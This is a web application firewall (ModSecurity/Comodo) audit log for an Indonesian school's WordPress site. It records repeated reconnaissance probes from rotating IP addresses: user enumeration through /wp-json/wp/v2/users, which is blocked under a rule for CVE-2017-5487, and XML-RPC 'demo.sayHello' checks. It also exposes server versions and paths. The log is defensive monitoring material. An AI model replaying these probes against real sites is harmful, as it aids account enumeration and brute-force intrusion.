proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429625731605 5335 (- - -) Stopwatch2: 1747429625731605 5335; combined=4042, p1=503, p2=3325, p3=28, p4=31, p5=92, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02458b67-Z-- --e3ea0a13-A-- [17/May/2025:04:09:34 +0700] aCepjnyxdQCiyU1ENFchuAAAAAU 103.236.140.4 55656 103.236.140.4 8181 --e3ea0a13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e3ea0a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3ea0a13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429774517828 2757 (- - -) Stopwatch2: 1747429774517828 2757; combined=1230, p1=432, p2=769, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3ea0a13-Z-- --70309d3c-A-- [17/May/2025:04:09:39 +0700] aCepk3yxdQCiyU1ENFchugAAAAc 103.236.140.4 55660 103.236.140.4 8181 --70309d3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --70309d3c-C-- demo.sayHello --70309d3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --70309d3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429779430292 4790 (- - -) Stopwatch2: 1747429779430292 4790; combined=3733, p1=429, p2=3100, p3=24, p4=28, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70309d3c-Z-- --702bd32b-A-- [17/May/2025:04:09:51 +0700] aCepn3yxdQCiyU1ENFchvAAAAAo 103.236.140.4 55664 103.236.140.4 8181 --702bd32b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --702bd32b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --702bd32b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429791600310 2214 (- - -) Stopwatch2: 1747429791600310 2214; combined=996, p1=338, p2=631, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --702bd32b-Z-- --33d66f7b-A-- [17/May/2025:04:09:56 +0700] aCeppHyxdQCiyU1ENFchvgAAAAw 103.236.140.4 55668 103.236.140.4 8181 --33d66f7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --33d66f7b-C-- demo.sayHello --33d66f7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d66f7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429796287223 4520 (- - -) Stopwatch2: 1747429796287223 4520; combined=3536, p1=413, p2=2923, p3=25, p4=24, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d66f7b-Z-- --35e51273-A-- [17/May/2025:04:10:55 +0700] aCep33yxdQCiyU1ENFchwAAAAA4 103.236.140.4 55678 103.236.140.4 8181 --35e51273-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --35e51273-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e51273-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429855563872 2862 (- - -) Stopwatch2: 1747429855563872 2862; combined=1426, p1=488, p2=894, p3=0, p4=0, p5=43, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e51273-Z-- --89a4e479-A-- [17/May/2025:04:11:01 +0700] aCep5QTOsBn9MSWb6WJp2AAAAIM 103.236.140.4 55682 103.236.140.4 8181 --89a4e479-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --89a4e479-C-- demo.sayHello --89a4e479-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --89a4e479-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429861304829 6037 (- - -) Stopwatch2: 1747429861304829 6037; combined=4353, p1=560, p2=3609, p3=35, p4=27, p5=71, sr=75, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89a4e479-Z-- --929ab347-A-- [17/May/2025:04:11:57 +0700] aCeqHXyxdQCiyU1ENFchwgAAABM 103.236.140.4 55686 103.236.140.4 8181 --929ab347-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --929ab347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --929ab347-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429917575636 3536 (- - -) Stopwatch2: 1747429917575636 3536; combined=1557, p1=570, p2=949, p3=0, p4=0, p5=38, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --929ab347-Z-- --5eb68459-A-- [17/May/2025:04:12:02 +0700] aCeqInyxdQCiyU1ENFchxAAAABY 103.236.140.4 55690 103.236.140.4 8181 --5eb68459-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.105 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5eb68459-C-- demo.sayHello --5eb68459-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eb68459-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429922276517 6829 (- - -) Stopwatch2: 1747429922276517 6829; combined=4914, p1=708, p2=3955, p3=37, p4=45, p5=100, sr=167, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eb68459-Z-- --ca66835c-A-- [17/May/2025:04:12:32 +0700] aCeqQHyxdQCiyU1ENFchxwAAAAI 103.236.140.4 55696 103.236.140.4 8181 --ca66835c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca66835c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca66835c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429952618308 3276 (- - -) Stopwatch2: 1747429952618308 3276; combined=1468, p1=475, p2=903, p3=0, p4=0, p5=90, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca66835c-Z-- --75fcf63a-A-- [17/May/2025:04:12:37 +0700] aCeqRXyxdQCiyU1ENFchyQAAAAQ 103.236.140.4 55700 103.236.140.4 8181 --75fcf63a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --75fcf63a-C-- demo.sayHello --75fcf63a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --75fcf63a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429957967983 6258 (- - -) Stopwatch2: 1747429957967983 6258; combined=4544, p1=612, p2=3753, p3=30, p4=35, p5=69, sr=81, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75fcf63a-Z-- --1f44874f-A-- [17/May/2025:04:12:54 +0700] aCeqVnyxdQCiyU1ENFchywAAAAc 103.236.140.4 55704 103.236.140.4 8181 --1f44874f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1f44874f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f44874f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429974021492 2815 (- - -) Stopwatch2: 1747429974021492 2815; combined=1276, p1=420, p2=827, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f44874f-Z-- --ee614c6a-A-- [17/May/2025:04:12:59 +0700] aCeqW3yxdQCiyU1ENFchzgAAAAw 103.236.140.4 55710 103.236.140.4 8181 --ee614c6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee614c6a-C-- demo.sayHello --ee614c6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee614c6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429979127908 4877 (- - -) Stopwatch2: 1747429979127908 4877; combined=3798, p1=481, p2=3107, p3=26, p4=30, p5=92, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee614c6a-Z-- --725f2f1f-A-- [17/May/2025:04:13:02 +0700] aCeqXnyxdQCiyU1ENFchzwAAAA0 103.236.140.4 55712 103.236.140.4 8181 --725f2f1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --725f2f1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --725f2f1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429982832628 2503 (- - -) Stopwatch2: 1747429982832628 2503; combined=1035, p1=351, p2=661, p3=0, p4=0, p5=23, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --725f2f1f-Z-- --e28a024b-A-- [17/May/2025:04:13:08 +0700] aCeqZHyxdQCiyU1ENFch0QAAABE 103.236.140.4 55718 103.236.140.4 8181 --e28a024b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e28a024b-C-- demo.sayHello --e28a024b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e28a024b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429988739667 18636 (- - -) Stopwatch2: 1747429988739667 18636; combined=29482, p1=618, p2=3485, p3=31, p4=42, p5=12668, sr=119, sw=66, l=0, gc=12572 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e28a024b-Z-- --dec3e547-A-- [17/May/2025:04:14:02 +0700] aCeqmnyxdQCiyU1ENFch2wAAAAk 103.236.140.4 55740 103.236.140.4 8181 --dec3e547-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dec3e547-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dec3e547-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430042805437 2820 (- - -) Stopwatch2: 1747430042805437 2820; combined=1269, p1=420, p2=819, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dec3e547-Z-- --d34be913-A-- [17/May/2025:04:14:09 +0700] aCeqoXyxdQCiyU1ENFch3gAAAA4 103.236.140.4 55746 103.236.140.4 8181 --d34be913-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d34be913-C-- demo.sayHello --d34be913-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d34be913-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430049588551 6468 (- - -) Stopwatch2: 1747430049588551 6468; combined=4650, p1=618, p2=3791, p3=39, p4=44, p5=95, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d34be913-Z-- --88a9185c-A-- [17/May/2025:04:14:28 +0700] aCeqtHyxdQCiyU1ENFch4QAAABI 103.236.140.4 55752 103.236.140.4 8181 --88a9185c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --88a9185c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88a9185c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] 